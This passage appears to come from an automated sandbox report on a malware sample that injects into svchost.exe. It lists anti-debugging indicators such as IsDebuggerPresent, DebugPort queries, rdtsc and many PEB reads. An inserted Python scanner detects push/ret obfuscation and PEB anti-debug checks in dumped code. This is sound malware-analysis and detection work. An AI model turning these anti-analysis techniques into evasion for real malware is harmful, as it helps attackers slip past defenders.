          Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\PresentationHost.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004175E3 LdrLoadDll,1_2_004175E3
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006741FD BlockInput,0_2_006741FD
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00603B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00603B4C
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00635CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00635CCC
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0067C304 LoadLibraryA,GetProcAddress,0_2_0067C304
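The push/ret sequences listed earlier (for example "push 62E932ECh; ret" and "push FFFFFF8Bh; iretd") and the fs:[00000030h] reads that follow are both visible in the raw bytes of a 32-bit dump, so they can be triaged without re-running the sample. The Python below is an added example, not code from the report or from the sample: it scans a constructed byte string for push-then-return pairs and for mov r32, fs:[30h] PEB loads, and, as a heuristic, labels the PEB field the next instruction reads (BeingDebugged at +2 and NtGlobalFlag at +68h are the anti-debug fields; Ldr and ProcessHeap are included only so ordinary loader code is labelled rather than misread). It is a linear byte scan, not a disassembler, so it can also match inside data or in the middle of another instruction; the hits are leads to confirm in a disassembler, and the 64-bit form (gs:[60h]) is out of scope.

```python
"""Triage scanner for two x86 indicators the sandbox flagged: push/ret control-flow
obfuscation and fs:[30h] PEB reads. Byte-level heuristic, not a disassembler."""
import re

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RET_OPCODES = {0xC3: "ret", 0xC2: "ret imm16", 0xCB: "retf", 0xCF: "iretd"}
# 32-bit PEB offsets commonly read by anti-debug and loader code (subset, for labelling)
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}
# mov eax, fs:[30h] (64 A1 30000000) or mov r32, fs:[30h] via 8B /r with disp32 (mod=00, rm=101)
PEB_LOAD = re.compile(rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00")


def find_push_ret(code: bytes):
    """Return (offset, mnemonic) for a push followed directly by a return opcode."""
    hits, n = [], len(code)
    for i, b in enumerate(code):
        if 0x50 <= b <= 0x57 and i + 1 < n and code[i + 1] in RET_OPCODES:      # push r32; ret
            hits.append((i, f"push {REGS[b - 0x50]}; {RET_OPCODES[code[i + 1]]}"))
        elif b in (0x60, 0x9C) and i + 1 < n and code[i + 1] in RET_OPCODES:  # pushad/pushfd; ret
            hits.append((i, f"{'pushad' if b == 0x60 else 'pushfd'}; {RET_OPCODES[code[i + 1]]}"))
        elif b == 0x68 and i + 5 < n and code[i + 5] in RET_OPCODES:          # push imm32; ret
            imm = int.from_bytes(code[i + 1:i + 5], "little")
            hits.append((i, f"push {imm:08X}h; {RET_OPCODES[code[i + 5]]}"))
        elif b == 0x6A and i + 2 < n and code[i + 2] in RET_OPCODES:          # push imm8; ret
            imm = code[i + 1] - 0x100 if code[i + 1] & 0x80 else code[i + 1]  # imm8 is sign-extended
            hits.append((i, f"push {imm & 0xFFFFFFFF:08X}h; {RET_OPCODES[code[i + 2]]}"))
    return hits


def _field_after(code: bytes, pos: int, reg: str):
    """Heuristic: if the instruction at pos reads [reg+disp8], name the PEB field."""
    rm = REGS.index(reg)
    if rm == 4:                      # esp base needs a SIB byte; not handled
        return None
    # mov r8,[..] (8A) / mov r32,[..] (8B) / movzx r32, byte [..] (0F B6) / cmp byte [..], imm8 (80 /7)
    for opc in (b"\x8A", b"\x8B", b"\x0F\xB6", b"\x80"):
        if code.startswith(opc, pos) and pos + len(opc) + 1 < len(code):
            modrm, disp = code[pos + len(opc)], code[pos + len(opc) + 1]
            if modrm >> 6 == 1 and modrm & 7 == rm and (opc != b"\x80" or (modrm >> 3) & 7 == 7):
                return PEB_FIELDS.get(disp, f"+{disp:#x}")
    return None


def find_peb_reads(code: bytes):
    """Return (offset, destination register, PEB field read next or None)."""
    hits = []
    for m in PEB_LOAD.finditer(code):
        raw = m.group(0)
        reg = "eax" if raw[1] == 0xA1 else REGS[(raw[2] >> 3) & 7]
        hits.append((m.start(), reg, _field_after(code, m.end(), reg)))
    return hits


def scan(code: bytes):
    return {"push_ret": find_push_ret(code), "peb_reads": find_peb_reads(code)}


# Constructed bytes mirroring rows in the report; not taken from the sample.
SAMPLE = (
    b"\x55\x8B\xEC"                      # push ebp; mov ebp, esp   (ordinary prologue, no hit)
    b"\x64\xA1\x30\x00\x00\x00"          # mov eax, fs:[30h]
    b"\x8A\x40\x02"                      # mov al, [eax+2]          -> PEB.BeingDebugged
    b"\x64\x8B\x0D\x30\x00\x00\x00"      # mov ecx, fs:[30h]
    b"\x8B\x49\x68"                      # mov ecx, [ecx+68h]       -> PEB.NtGlobalFlag
    b"\x68\xEC\x32\xE9\x62\xC3"          # push 62E932ECh; ret
    b"\x56\xC3"                          # push esi; ret
    b"\x60\xC3"                          # pushad; ret
    b"\x50\x5D"                          # push eax; pop ebp        (no hit)
    b"\x6A\x8B\xCF"                      # push FFFFFF8Bh; iretd
)

if __name__ == "__main__":
    for key, rows in scan(SAMPLE).items():
        for row in rows:
            print(key, *row)
```

Run scan() over a dumped code region (the .text section of the dropped executable, or the injected region in svchost.exe) and treat the push/ret offsets as entry points for manual tracing: the pushed value is the real next address, so a disassembler that follows fall-through will show nonsense after each one. The 0x68 disp8 byte inside "mov ecx,[ecx+68h]" in the sample is also a push imm32 opcode, which is exactly the kind of false hit a byte scan can produce on other input.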
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_03943510 mov eax, dword ptr fs:[00000030h]0_2_03943510
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_039434B0 mov eax, dword ptr fs:[00000030h]0_2_039434B0
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_03941E70 mov eax, dword ptr fs:[00000030h]0_2_03941E70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]1_2_03308324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov ecx, dword ptr fs:[00000030h]1_2_03308324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]1_2_03308324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]1_2_03308324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C310 mov ecx, dword ptr fs:[00000030h]1_2_0322C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250310 mov ecx, dword ptr fs:[00000030h]1_2_03250310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D437C mov eax, dword ptr fs:[00000030h]1_2_032D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov ecx, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA352 mov eax, dword ptr fs:[00000030h]1_2_032FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8350 mov ecx, dword ptr fs:[00000030h]1_2_032D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330634F mov eax, dword ptr fs:[00000030h]1_2_0330634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032663FF mov eax, dword ptr fs:[00000030h]1_2_032663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC3CD mov eax, dword ptr fs:[00000030h]1_2_032EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B63C0 mov eax, dword ptr fs:[00000030h]1_2_032B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov ecx, dword ptr fs:[00000030h]1_2_032DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322823B mov eax, dword ptr fs:[00000030h]1_2_0322823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322826B mov eax, dword ptr fs:[00000030h]1_2_0322826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov eax, dword ptr fs:[00000030h]1_2_032B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov ecx, dword ptr fs:[00000030h]1_2_032B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330625D mov eax, dword ptr fs:[00000030h]1_2_0330625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A250 mov eax, dword ptr fs:[00000030h]1_2_0322A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236259 mov eax, dword ptr fs:[00000030h]1_2_03236259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov ecx, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]1_2_032402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]1_2_0323A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033062D6 mov eax, dword ptr fs:[00000030h]1_2_033062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260124 mov eax, dword ptr fs:[00000030h]1_2_03260124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]1_2_032DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov ecx, dword ptr fs:[00000030h]1_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]1_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F0115 mov eax, dword ptr fs:[00000030h]1_2_032F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]1_2_03304164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]1_2_03304164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov ecx, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]1_2_032C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C156 mov eax, dword ptr fs:[00000030h]1_2_0322C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C8158 mov eax, dword ptr fs:[00000030h]1_2_032C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]1_2_032AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC912 mov eax, dword ptr fs:[00000030h]1_2_032BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]1_2_03228918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]1_2_03256962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov edx, dword ptr fs:[00000030h]1_2_0327096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC97C mov eax, dword ptr fs:[00000030h]1_2_032BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0946 mov eax, dword ptr fs:[00000030h]1_2_032B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304940 mov eax, dword ptr fs:[00000030h]1_2_03304940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
